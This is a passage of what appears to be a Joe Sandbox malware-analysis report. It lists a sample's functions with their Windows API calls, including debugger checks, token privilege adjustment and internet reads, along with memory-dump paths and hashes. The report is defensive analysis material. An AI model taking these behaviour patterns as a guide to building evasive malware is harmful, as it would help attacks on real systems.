                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2576544623-0
                                                                                                                                                  • Opcode ID: 89fde9512b94cb07eafd2aa5ff05997a94c0a9f5672a7c8b2447530929707f10
                                                                                                                                                  • Instruction ID: a98c0e68db7b9d45d0fd814aff1298f869d04e0007e226020b87bcf654703779
                                                                                                                                                  • Opcode Fuzzy Hash: 89fde9512b94cb07eafd2aa5ff05997a94c0a9f5672a7c8b2447530929707f10
                                                                                                                                                  • Instruction Fuzzy Hash: BB519171504300AFD310EF21CC85EABB7E8EF88714F10492EF595A72A1DB34AD08CB96
                                                                                                                                                  Function 0045E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0045E628
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                  • String ID: ($|
                                                                                                                                                  • API String ID: 1659193697-1631851259
                                                                                                                                                  • Opcode ID: e4b6563495775eced85f6639daf36049b9172e9dced26037dbca7602620842ae
                                                                                                                                                  • Instruction ID: d66d97c7bb63d5e7dad9b567a4e3f94d41a6da7275ee88609bc8c1bec3a8e44c
                                                                                                                                                  • Opcode Fuzzy Hash: e4b6563495775eced85f6639daf36049b9172e9dced26037dbca7602620842ae
                                                                                                                                                  • Instruction Fuzzy Hash: 21322675A007059FD728CF2AC481A6AB7F0FF48310B15C56EE89ADB3A2E774E941CB44
                                                                                                                                                  Function 004722EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047180A,00000000), ref: 004723E1
                                                                                                                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00472418
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 599397726-0
                                                                                                                                                  • Opcode ID: e7707af6f25208033fda62ebdde61bcb9e23fc8501fea6a1bf99df50b1f9224e
                                                                                                                                                  • Instruction ID: 97e6fa55f52fdedc64eb36c533065f345fcd4e8e1beeb73d4f24c64f527f6271
                                                                                                                                                  • Opcode Fuzzy Hash: e7707af6f25208033fda62ebdde61bcb9e23fc8501fea6a1bf99df50b1f9224e
                                                                                                                                                  • Instruction Fuzzy Hash: 0941DA71604205BFEB20DE65DE81EFB77BCEB40314F10806FFA49A6241DABC9E419658
                                                                                                                                                  Function 00AB1361 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00AB1459
                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00AB1463
                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 00AB1470
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                  • Opcode ID: 4e38ab2c5e39e7b76107b16c232cf8d9df471aedabe15ba9f37842bf35c210b7
                                                                                                                                                  • Instruction ID: c74b022801f810161ef24b12ea561cdd97d9f028ce5c0da58d58d926ed6b6e63
                                                                                                                                                  • Opcode Fuzzy Hash: 4e38ab2c5e39e7b76107b16c232cf8d9df471aedabe15ba9f37842bf35c210b7
                                                                                                                                                  • Instruction Fuzzy Hash: 8131D374D0122C9BCB21DF64D988BDCBBB8EF08310F5042DAE41DA6261E7309F858F55
                                                                                                                                                  Function 0046B333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0046B343
                                                                                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0046B39D
                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0046B3EA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1682464887-0
                                                                                                                                                  • Opcode ID: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                                                                                                                                                  • Instruction ID: 737ef1c34fd19c378388d330bbb387c55d680846c188baab6e7c30573ba64571
                                                                                                                                                  • Opcode Fuzzy Hash: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                                                                                                                                                  • Instruction Fuzzy Hash: 7D21AE75A10108EFCB00EFA5D880AEEBBB8FF48314F0080AAE905AB351DB359D59CB55
                                                                                                                                                  Function 004587E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                                                                                    • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00458865
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1922334811-0
                                                                                                                                                  • Opcode ID: a92a6e461037143895f69c145384908288df5c64050873de664138e79dc066f9
                                                                                                                                                  • Instruction ID: 5e41a7b511489fb1457012ee205441660039eb57adee2e696ecce50f3e5e177b
                                                                                                                                                  • Opcode Fuzzy Hash: a92a6e461037143895f69c145384908288df5c64050873de664138e79dc066f9
                                                                                                                                                  • Instruction Fuzzy Hash: 7511BFB2514204AFE718EFA4EC85D2BB7F8EB05315B60852EF85593212EF34BC448B64
                                                                                                                                                  Function 0045874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00458774
                                                                                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0045878B
                                                                                                                                                  • FreeSid.ADVAPI32(?), ref: 0045879B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3429775523-0
                                                                                                                                                  • Opcode ID: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                                                                                                                                  • Instruction ID: 222101879978235e3db2a0a583f2c1bf244a93baf2b2f2d6b5292d8d16c370cf
                                                                                                                                                  • Opcode Fuzzy Hash: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                                                                                                                                  • Instruction Fuzzy Hash: 4CF04F7591130CBFDF00DFF4DC89AAEB7BCEF09201F104879A901E2181D7756A088B54
                                                                                                                                                  Function 00AB3F3D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000003,?,00AB3F13,00000003,00ACDE80,0000000C,00AB403D,00000003,00000002,00000000,?,00AB2038,00000003), ref: 00AB3F5E
                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,00AB3F13,00000003,00ACDE80,0000000C,00AB403D,00000003,00000002,00000000,?,00AB2038,00000003), ref: 00AB3F65
                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00AB3F77
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                  • Opcode ID: 94972aff597f70eb2123596cbaac9ec023aea736b58e063f5fa078194bb2c091
                                                                                                                                                  • Instruction ID: 690b9280347671f6a2cae573db35d82ef6feba7aa4fe7a35589629bca615b9a3
                                                                                                                                                  • Opcode Fuzzy Hash: 94972aff597f70eb2123596cbaac9ec023aea736b58e063f5fa078194bb2c091
                                                                                                                                                  • Instruction Fuzzy Hash: 6CE0B632404A08ABCF11AFA9ED09AA93B7DEB54781F044518F9459A133DB39DE43DB81
                                                                                                                                                  Function 00468889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __time64.LIBCMT ref: 0046889B
                                                                                                                                                    • Part of subcall function 0042520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00468F6E,00000000,?,?,?,?,0046911F,00000000,?), ref: 00425213
                                                                                                                                                    • Part of subcall function 0042520A: __aulldiv.LIBCMT ref: 00425233
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                                                  • String ID: 0eL
                                                                                                                                                  • API String ID: 2893107130-3167399643
                                                                                                                                                  • Opcode ID: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                                                                                                                                                  • Instruction ID: 2c57299538d283c5d644ae0a39161a0e0d0ec28ce0c746f6c7e9e831f8b60585
                                                                                                                                                  • Opcode Fuzzy Hash: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                                                                                                                                                  • Instruction Fuzzy Hash: B421AF326256108BC729CF29D841A52B3E1EFA5311B698F6DD0F5CB2C0DA38A905CB58
                                                                                                                                                  Function 0046C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0046C6FB
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0046C72B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                  • Opcode ID: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                                                                                                                                                  • Instruction ID: b4b64e4e0be63edce78860a78e1dfdfe78961efcf08952f795b51eb70efe8952
                                                                                                                                                  • Opcode Fuzzy Hash: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                                                                                                                                                  • Instruction Fuzzy Hash: 411152726106049FDB10EF29D88592AF7E5EF85325F00C52EF9A5D7391DB34AC05CB85
                                                                                                                                                  Function 0046A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A097
                                                                                                                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A0A9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFormatLastMessage
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3479602957-0
                                                                                                                                                  • Opcode ID: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
                                                                                                                                                  • Instruction ID: 2c9db32d3ae4548df1de74cdb7d607b6943671b75e71bd67b23ca617ca970478
                                                                                                                                                  • Opcode Fuzzy Hash: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
                                                                                                                                                  • Instruction Fuzzy Hash: D8F0823550522DABDB21AFA4CC48FEE776CBF08361F00416AF909E6191DA349954CBA6
                                                                                                                                                  Function 004581CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                                                                                                                                                  • CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 81990902-0
                                                                                                                                                  • Opcode ID: 9ec38f7879727ea9b1300892ff3550b9fff1aaeeeffd9baaebef182c4f9d335e
                                                                                                                                                  • Instruction ID: 9bafbd08ffd8acbbb2d026fb6ea58a2c51283803ccb0941fee12b6a17b14d6d6
                                                                                                                                                  • Opcode Fuzzy Hash: 9ec38f7879727ea9b1300892ff3550b9fff1aaeeeffd9baaebef182c4f9d335e
                                                                                                                                                  • Instruction Fuzzy Hash: 13E04632000620AEE7212B61FC08D777BEAEB04314720882EB8A680431CF22AC90DB18
                                                                                                                                                  Function 0042A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,00494178,00428D57,00493E50,?,?,00000001), ref: 0042A15A
                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0042A163
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                  • Opcode ID: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                                                                                                                                                  • Instruction ID: 9da78fce3b57c7d2137df8720d13279edd616241823e717daaa40eb201d223bb
                                                                                                                                                  • Opcode Fuzzy Hash: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                                                                                                                                                  • Instruction Fuzzy Hash: CCB09231254308ABCA022B91EC09B8C3F68EB46AA2F404434FA0D84C60CB6254548B99
                                                                                                                                                  Function 0042F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                                                                                                                                  • Instruction ID: 9dbe1c865c2330f56ffee62ed517aae1867acb93b770053fb6672ec4a27fddfc
                                                                                                                                                  • Opcode Fuzzy Hash: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                                                                                                                                  • Instruction Fuzzy Hash: 08322861E29F114DD7239634D832336A258AFB73C8F95D737F819B5AA5EB28D4C34208
                                                                                                                                                  Function 0043242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
